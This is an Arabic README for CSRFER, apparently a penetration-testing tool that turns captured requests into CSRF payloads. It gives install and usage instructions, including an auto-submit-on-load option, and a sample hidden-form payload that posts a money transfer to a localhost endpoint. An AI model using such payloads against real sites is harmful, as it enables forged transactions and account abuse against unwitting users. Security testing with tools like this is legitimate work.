
أداة لتوليد حمولات csrf بناءً على الطلبات الضعيفة
_____ _________________ ___________
/ __ \/ ___| ___ \ ___| ___| ___ \
| / \/\ `--.| |_/ / |_ | |__ | |_/ /
| | `--. \ /| _| | __|| /
| \__/\/\__/ / |\ \| | | |___| |\ \
\____/\____/\_| \_\_| \____/\_| \_|
-.--.
) " '-,
',' 2 \_
\q \ . \
_.--' '----.__
/ ._ _.__ \__
_.'_.' \_ .-._\_ '-, }
(,/ _.---;-( . \ \ ~
____ ( .___\_\ \/_/
( '-._ \ \ |
'._ ),> _) >
'-._ c=' Cooo -._
'-._ '.
'-._ `\
snd '-._ '.
'-._ \
`~---'
CSRFER هي أداة لتوليد حمولات CSRF بناءً على الطلبات الضعيفة.
تقوم بتحليل الطلبات المُقدَّمة لتوليد إما نموذج (form) أو طلب (fetch). يمكن بعد ذلك تضمين الحمولة في قالب HTML.
npm install -g csrfer
الاستخدام: csrfer [options]
الخيارات:
--version عرض رقم الإصدار
-r, --request مسار ملف الطلب المراد استخدامه
-m, --mode الوضع لتوليد الكود. الخيارات المتاحة: form, fetch. (الافتراضي هو form)
-a, --autosubmit إرسال الطلب تلقائياً عند تحميل الصفحة
-s, --show عرض مدخلات النموذج (فقط لوضع form)
-o, --output إخراج الحمولة إلى الملف المحدد بدلاً من STDOUT
-t, --template مسار لصفحة قالب HTML. استخدم العنصر النائب {{CONTENT}} لتحديد مكان
حقن الكود (في HTML، وليس JavaScript)
-T, --defaulttemplate استخدم هذا الخيار إذا كنت تريد حقن الكود في صفحة HTML افتراضية.
-h, --help عرض المساعدة
أمثلة:
csrfer -r req.txt -m form -a إرسال طلب نموذج تلقائياً
csrfer -r req.txt -m form -s توليد وعرض نموذج لإرساله يدوياً
csrfer -r req.txt -m fetch -t my_template.html توليد طلب fetch واستخدام صفحة القالب المُقدَّمة
<!DOCTYPE html>
<html>
<head>
<title>This is Hello World page</title>
</head>
<body>
<h1>Hello World</h1>
<form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50€' /><br><input
type='submit' value='submit'></form>
</body>
</html>
هذا المشروع مرخص بموجب MIT.